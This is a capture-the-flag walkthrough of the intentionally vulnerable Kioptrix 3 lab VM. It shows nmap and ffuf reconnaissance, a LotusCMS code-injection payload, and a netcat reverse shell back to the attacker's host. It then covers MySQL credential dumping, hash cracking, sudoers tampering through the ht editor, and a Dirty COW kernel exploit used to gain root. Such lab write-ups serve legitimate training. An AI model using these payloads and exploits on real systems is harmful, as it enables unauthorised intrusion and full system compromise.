Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Nmap 7.92 scan initiated Thu Jan 6 00:19:34 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/kioptrix3/192.168.1.95/scans/_full_tcp_nmap.txt -oX /root/vulnHub/kioptrix3/192.168.1.95/scans/xml/_full_tcp_nmap.xml 192.168.1.95
Nmap scan report for 192.168.1.95
Host is up, received arp-response (0.0032s latency).
Scanned at 2022-01-06 00:19:35 +08 for 28s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x
| 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
MAC Address: 00:0C:29:03:05:C9 (VMware)
Device type: general purpose|WAP|switch|media device|VoIP phone|storage-misc
Running (JUST GUESSING): Linux 2.6.X|2.4.X (99%), Linksys embedded (96%), Extreme Networks ExtremeXOS 15.X|12.X (94%), LifeSize embedded (94%), ShoreTel embedded (94%), LaCie embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:linksys:wrv54g cpe:/o:extremenetworks:extremexos:15.3 cpe:/o:extremenetworks:extremexos:12.5.1 cpe:/o:linux:linux_kernel:2.4 cpe:/h:shoretel:8800 cpe:/o:linux:linux_kernel:2.6.31 cpe:/h:lacie:5big_network_2
Aggressive OS guesses: Linux 2.6.9 - 2.6.33 (99%), Linux 2.6.22 (embedded, ARM) (98%), Linux 2.6.22 - 2.6.23 (98%), Linksys WRV54G WAP (96%), Linux 2.6.19 - 2.6.36 (95%), Linux 2.6.31 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.13 - 2.6.32 (95%), Extreme Networks ExtremeXOS 12.5.1 or 15.3 (94%), Linux 2.4.18 - 2.4.35 (likely embedded) (94%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/6%OT=22%CT=1%CU=35166%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=61D5C533%P=x86_64-pc-linux-gnu)SEQ(SP=D0%GCD=1%ISR=D3%TI=Z%CI=Z%II=I%TS
OS:=7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=M
OS:5B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16
OS:A0)ECN(R=Y%DF=Y%TG=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)ECN(R=Y%DF=Y%T=40%W=16
OS:D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%D
OS:F=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%TG=40%W=16A0%S=O%A=S+%
OS:F=AS%O=M5B4ST11NW5%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4S
OS:T11NW5%RD=0%Q=)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T7(R=N)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%TG
OS:=40%CD=S)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.002 days (since Thu Jan 6 00:17:46 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 3.15 ms 192.168.1.95
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 6 00:20:03 2022 -- 1 IP address (1 host up) scanned in 29.80 seconds
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root💀kali)-[~/vulnHub/kioptrix3]
└─# ffuf -u http://192.168.1.107/FUZZ -w /usr/share/wordlists/dirb/common.txt -e ".php,.html,.txt" -fw 24
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.107/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 24
________________________________________________
[Status: 200, Size: 1819, Words: 167, Lines: 39]
cache [Status: 301, Size: 353, Words: 23, Lines: 10]
core [Status: 301, Size: 352, Words: 23, Lines: 10]
favicon.ico [Status: 200, Size: 23126, Words: 13, Lines: 6]
gallery [Status: 301, Size: 355, Words: 23, Lines: 10]
index.php [Status: 200, Size: 1819, Words: 167, Lines: 39]
index.php [Status: 200, Size: 1819, Words: 167, Lines: 39]
modules [Status: 301, Size: 355, Words: 23, Lines: 10]
phpmyadmin [Status: 301, Size: 358, Words: 23, Lines: 10]
style [Status: 301, Size: 353, Words: 23, Lines: 10]
update.php [Status: 200, Size: 18, Words: 2, Lines: 1]
:: Progress: [18460/18460] :: Job [1/1] :: 15386 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
phpmyadminupdate.php
Initial Foothold
TCP/80 (HTTP) - Lotus CMS Exploit
- View enumerated directories
update.php- Permission Denied
phpmyadmin![]()
index.php![]()
- Proceed to login
![]()
- LotusCMS
- Search for LotusCMS Exploits
- Manual Exploit
- Payload
1
curl http://192.168.1.107/index.php --data "page=index');${system('COMMAND TO EXECUTE')};#" - URL Encoded Payload
1
curl http://192.168.1.107/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27COMMAND TO EXECUTE%27%29%7D%3B%23%22
![]()
- URL Encode “COMMAND TO EXECUTE”
1 2 3 4
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95] └─# hURL --URL "echo -n Vulnerability Found" Original :: echo -n Vulnerability Found URL ENcoded :: echo%20-n%20Vulnerability%20Found
- Check if target is susceptible
1 2 3 4 5 6
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95] └─# curl http://192.168.1.107/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27echo%20-n%20Vulnerability%20Found%27%29%7D%3B%23%22" | grep -ioP "vulnerability found" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1926 0 1838 100 88 802k 39338 --:--:-- --:--:-- --:--:-- 940k Vulnerability Found - Execute Reverse Shell
1
curl http://192.168.1.107/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27nc+192.168.1.1+4444+-e+/bin/bash%27%29%7D%3B%23%22
- Obtained www-data shell
1 2 3 4 5 6 7 8 9
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95/exploit2] └─# nc -nvlp 4444 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.1.107. Ncat: Connection from 192.168.1.107:59717. whoami www-data
![]()
- Payload
Privilege Escalation
Loneferret - Via Creds Found
- Look for SQL Credentials
1 2 3 4 5 6 7 8 9
www-data@Kioptrix3:/home/www/kioptrix3.com$ grep -Rnw $(pwd)/* -ie "connect" --color=always 2>/dev/null /home/www/kioptrix3.com/core/lib/RemoteFiles.php:91: // connect to the remote server /home/www/kioptrix3.com/gallery/gheader.php:25: // Connect to MySQL /home/www/kioptrix3.com/gallery/install.BAK:96: // Try to connect to the database /home/www/kioptrix3.com/gallery/themes/black/stats.php:49://Connect to local host to check URL data /home/www/kioptrix3.com/gallery/themes/black/stats.php:75: $db = MYSQL_CONNECT($host,$user, $pass) OR DIE("Unable to connect to database"); /home/www/kioptrix3.com/gallery/themes/black/stats.php:132://Connect to remote host to get initial URL data if there is no local data /home/www/kioptrix3.com/gallery/themes/black/stats.php:138: $db = MYSQL_CONNECT($host,$user, $pass) OR DIE("Unable to connect to database"); - View
stats.php![]()
1 2 3
www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u lancore_gallarif -p Enter password: ERROR 1045 (28000): Access denied for user 'lancore_gallarif'@'localhost' (using password: YES)
- Not the database we are looking for
- View
gheader.php![]()
/gfunctions.php/gconfig.php
- Find configuration files
1 2 3 4
www-data@Kioptrix3:/home/www/kioptrix3.com$ find $(pwd) 2> /dev/null | grep "gfunctions\|gconfig" /home/www/kioptrix3.com/gallery/gfunctions.php /home/www/kioptrix3.com/gallery/BACK/gfunctions.php.bak /home/www/kioptrix3.com/gallery/gconfig.php
- View
gconfig.php![]()
- root:fuckeyou
- Access mysql to obtain more creds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u lancore_gallarif -p Enter password: ERROR 1045 (28000): Access denied for user 'lancore_gallarif'@'localhost' (using password: YES) www-data@Kioptrix3:/home/www/kioptrix3.com$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 15 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | gallery | | mysql | +--------------------+ 3 rows in set (0.00 sec) mysql> use gallery Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +----------------------+ | Tables_in_gallery | +----------------------+ | dev_accounts | | gallarific_comments | | gallarific_galleries | | gallarific_photos | | gallarific_settings | | gallarific_stats | | gallarific_users | +----------------------+ 7 rows in set (0.00 sec) mysql> select * from dev_accounts; +----+------------+----------------------------------+ | id | username | password | +----+------------+----------------------------------+ | 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 | # MD5 Hash | 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | +----+------------+----------------------------------+ 2 rows in set (0.00 sec)
- Crack hash
1 2 3 4
┌──(root💀kali)-[~/vulnHub/kioptrix3/192.168.1.95/exploit] └─# hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt --show 0d3eccfb887aabd50f243b3f155c0f85:Mast3r 5badcaf789d3d1d09794d8f021f40f0e:starwars
- dreg:Mast3r
- loneferret:starwars
- Switch to loneferret
![]()
Root - Via Buffer Overflow
- Check sudo access
1 2 3 4 5 6
loneferret@Kioptrix3:~$ sudo -l sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht loneferret@Kioptrix3:~$ - Run
ht1 2 3 4
loneferret@Kioptrix3:~$ sudo ht sudo ht Error opening terminal: unknown. loneferret@Kioptrix3:~$ export TERM=xterm
![]()
ht 2.0.18
- Search for exploits
- https://www.exploit-database.net/?id=17836
- A bufferoverflow exploit where EIP is overwritten into spawning a shell
- Transfer exploit
- Exploit
1 2
python exploit.py > output sudo ht $(cat output)
![]()
Root - Via Sudo
- Edit
/etc/sudoersw/ ht editor1 2 3 4 5
export TERM=xterm sudo ht ALT + F > Open > /etc/sudoers Replace !/usr/bin/su w/ /bin/su ALT + F > Save > Quit
![]()
![]()
- Obtain root
1 2 3 4
loneferret@Kioptrix3:/home/www/kioptrix3.com$ sudo su root@Kioptrix3:/home/www/kioptrix3.com# whoami root root@Kioptrix3:/home/www/kioptrix3.com#
![]()
Privilege Escalation to Root - 3 via Kernel Exploit
- Ran linpeas
![]()
- Search exploits for
linux version 2.6.24- https://www.exploit-db.com/exploits/40839
- Transfer exploit
- Compile & Exploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
loneferret@Kioptrix3:/tmp$ nc 192.168.1.1 4444 > dirty.c loneferret@Kioptrix3:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt dirty.c:193:2: warning: no newline at end of file loneferret@Kioptrix3:/tmp$ chmod +x dirty; ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash mmap: b7fe0000 CTRL + C loneferret@Kioptrix3:/tmp$ su firefart Password: firefart@Kioptrix3:/tmp# cd /root firefart@Kioptrix3:~# whoami firefart firefart@Kioptrix3:~# id uid=0(firefart) gid=0(root) groups=0(root) firefart@Kioptrix3:~#
![]()
- Obtain Root Flag
![]()
Comments powered by Disqus.